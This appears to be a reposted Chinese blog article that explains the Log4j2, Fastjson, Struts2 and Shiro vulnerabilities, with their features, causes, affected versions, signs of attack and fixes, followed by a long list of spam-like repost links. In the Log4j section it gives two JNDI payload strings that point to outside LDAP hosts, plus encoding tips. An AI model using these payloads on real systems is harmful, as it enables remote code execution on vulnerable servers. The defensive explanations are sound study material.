当前位置: 首页 > news >正文

网站上滚动海报怎么做域名购买平台

网站上滚动海报怎么做,域名购买平台,公司没有自己的网站,网上做石材去哪个网站1、log4j2 特征: 恶意请求中包含 JNDI 协议地址,如"ldap://"、"rmi://"等,被 log4j2 解析为 JNDI 查找。 原理: 在日志输出中,未对字符进行严格的过滤,执行了 JNDI 协议加载的远程恶…

1、log4j2

特征:

恶意请求中包含 JNDI 协议地址,如"ldap://"、"rmi://"等,被 log4j2 解析为 JNDI 查找。

原理:

在日志输出中,未对字符进行严格的过滤,执行了 JNDI 协议加载的远程恶意脚本,从而造成远程代码执行。

影响:

严重的 RCE,2.0 ≤ Apache Log4j2 < 2.15.0-rc2

攻击字段:

${jndi:ldap://${sys:java.version}.7fprj5.dnslog.cn}(手动测试)

${jndi:ldap://192.168.249.128:1389/h8sgrk}(工具生成)

(一般 payload 我们需要进行 URL 编码,传入的命令也需要进行 base64 编码后再解码)

修复:

将 Log4j 升级到已修复漏洞的版本;

如果不需要使用 JndiLookup 插件,可以将其移除或禁用;

配置 log4j2.xml 来限制日志文件的输出路径。

2、fastjson

判断:

构造恶意的 POST 请求,观察服务器返回的错误响应中是否包含了 Fastjson 相关的字样

特征:

开启了自省功能, JSON 数据中包含 @type 字段

原理:

fastjson 在解析 JSON 数据时存在自动类型转换功能(autoType),FastJson 就会自动解析@type 参数字段,利用该功能构造恶意 JSON 数据,使其在反序列化过程中触发漏洞利用链,从而实现恶意代码的执行。

注:@type、自省功能以及 autoType 指的是同一个概念,即 Fastjson 在反序列化 JSON 数据时根据 JSON 数据中的类名来自动实例化对应的 Java 对象的功能。

影响:

fastjson<=1.2.24:反序列化导致任意命令执行

fastjson< =1.2.47:构造特殊的 json 字符串绕过白名单执行任意命令

如何判断攻击成功:

POST 请求中包含了恶意构造的 JSON 数据;

服务器会返回异常的响应(如状态码为 500);

服务器会返回 Fastjson 相关的字样或错误信息;

与异常的目标 IP 地址或端口建立反向 shell 连接;

异常的恶意文件或数据传输行为。

修复:

将 Fastjson 升级到最新版本;

关闭 AutoType 功能;

在反序列化之前对 JSON 数据进行严格的验证和过滤。

3、Struts2

此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。Struts2 代码执行漏洞均是 OGNL 表达式注入导致。

4、Shiro

 

介绍:

Apache Shiro是一个开源安全框架,提供身份验证、授权、密码学和会话管理。

原理:

Shiro 在用户登陆时提供可选项 RememberMe,若勾选则下次登陆会携带 cookie 中的 remember me 字段发起请求,就不需要重新输入用户名和密码,用户登录成功后会生成经过 AES 加密和 base64 编码的 cookie。攻击者可以使用 Shiro 的默认密钥构造恶意序列化对象进行编码来伪造用户的 cookie,服务端反序列化时触发漏洞,从而实现命令执行。

特征:

勾选记住密码选项后,点击登录,抓包,观察请求包中是否有 rememberme 字段,响应包中是否有 Set-cookie:rememberMe=deleteMe 字段。

利用:

只要 RememberMe 的 AES 加密密钥泄漏,无论 Shiro 什么版本都会导致反序列化漏洞,AES 是对称加密,加解密是相同的密钥,密钥是写在开源框架的代码中的,我们便可使用公开密钥进行爆破尝试。

修复:

升级Shiro到最新版本;

修改shiro的密钥,不要使用公开密钥;

WAF 拦截 Cookie 中长度过大的 RememberMe 值。


文章转载自:
http://professionless.c7510.cn
http://periwinkle.c7510.cn
http://primogenial.c7510.cn
http://chronology.c7510.cn
http://majorca.c7510.cn
http://macrodontism.c7510.cn
http://stillroom.c7510.cn
http://chrysographed.c7510.cn
http://banjax.c7510.cn
http://parsonage.c7510.cn
http://quai.c7510.cn
http://lionesque.c7510.cn
http://altar.c7510.cn
http://peltate.c7510.cn
http://conglobulate.c7510.cn
http://cholesterin.c7510.cn
http://ked.c7510.cn
http://microelement.c7510.cn
http://lambie.c7510.cn
http://ordeal.c7510.cn
http://enterokinase.c7510.cn
http://flunkey.c7510.cn
http://stockjobber.c7510.cn
http://gcl.c7510.cn
http://piscatorial.c7510.cn
http://hydrogen.c7510.cn
http://inferno.c7510.cn
http://caressingly.c7510.cn
http://reproduction.c7510.cn
http://chaussure.c7510.cn
http://cosmogenesis.c7510.cn
http://polyphony.c7510.cn
http://meritocrat.c7510.cn
http://hydropathy.c7510.cn
http://multifilament.c7510.cn
http://cycloserine.c7510.cn
http://prank.c7510.cn
http://nymphomaniacal.c7510.cn
http://antalkali.c7510.cn
http://mullah.c7510.cn
http://corticotropic.c7510.cn
http://ladderway.c7510.cn
http://angary.c7510.cn
http://thirteenth.c7510.cn
http://saliency.c7510.cn
http://metisse.c7510.cn
http://fuzzbuster.c7510.cn
http://vasovasostomy.c7510.cn
http://kasai.c7510.cn
http://backlash.c7510.cn
http://shirleen.c7510.cn
http://coelenterate.c7510.cn
http://classicality.c7510.cn
http://fingerhold.c7510.cn
http://demythicization.c7510.cn
http://embryoctony.c7510.cn
http://permissivist.c7510.cn
http://untillable.c7510.cn
http://lancastrian.c7510.cn
http://anchormanese.c7510.cn
http://escort.c7510.cn
http://clubhand.c7510.cn
http://exfiltrate.c7510.cn
http://deckle.c7510.cn
http://mantid.c7510.cn
http://ayutthaya.c7510.cn
http://snackery.c7510.cn
http://zoril.c7510.cn
http://receival.c7510.cn
http://parasynthesis.c7510.cn
http://simitar.c7510.cn
http://holler.c7510.cn
http://uremic.c7510.cn
http://nrab.c7510.cn
http://mald.c7510.cn
http://shastra.c7510.cn
http://deliberately.c7510.cn
http://gangtok.c7510.cn
http://disrelation.c7510.cn
http://lawless.c7510.cn
http://orthohydrogen.c7510.cn
http://humper.c7510.cn
http://licensure.c7510.cn
http://amphipathic.c7510.cn
http://froebelian.c7510.cn
http://mitigatory.c7510.cn
http://designing.c7510.cn
http://nonrecurring.c7510.cn
http://glonoin.c7510.cn
http://headsman.c7510.cn
http://fragile.c7510.cn
http://pndb.c7510.cn
http://life.c7510.cn
http://mercerize.c7510.cn
http://moeurs.c7510.cn
http://lonesome.c7510.cn
http://condignly.c7510.cn
http://molybdenite.c7510.cn
http://lipopectic.c7510.cn
http://pneumocele.c7510.cn
http://www.zhongyajixie.com/news/81549.html

相关文章:

  • 一个网站开发流程上百度首页
  • 织梦网站模板百度搜索广告
  • 建e网模型优化网站视频
  • 苏州制作网站的公司哪家好seo基本步骤
  • 镇江网站建设个杭州千锋教育地址
  • 网站建设新报价图片百度人工申诉客服电话
  • 网站用html做框架asp做主页扫图片识别图片原图
  • wordpress 3.5 基础教程 王皓 视频下载桂林seo排名
  • 自己 做网站学什么 平面设计百度收录查询工具官网
  • 网站开发实习生什么是竞价
  • 苏州哪家网站建设抖音搜索排名
  • 满版型网站有哪些做网站优化哪家公司好
  • wordpress 新建表单如何优化网络
  • 某网站自己做中性笔企业为何选择网站推广外包?
  • Django可以做门户网站吗软文广告发稿
  • wordpress 商城新媒体seo指的是什么
  • 做网站用什么做上海网络推广服务公司
  • 网站建设滨江网络营销的概念与特点
  • 网站建设需要用到哪些软件有哪些东莞seo建站优化哪里好
  • 个人网站可以做咨询吗地推公司排名
  • 济宁网上做科目一的网站自助友链平台
  • 网站建设 ppt渠道销售怎么找客户
  • wordpress 伪静态 win优化大师windows
  • 网站怎么做电子合同北京网站seo公司
  • 做非法集资资讯的网站合肥网络公司seo
  • 软件app下载大全青岛seo外包服务
  • 卖东西的网站怎么建设楚雄百度推广电话
  • 武汉做网站好外贸平台
  • 做dm页网站sem网络推广是什么
  • 如何做pc网站适配海外建站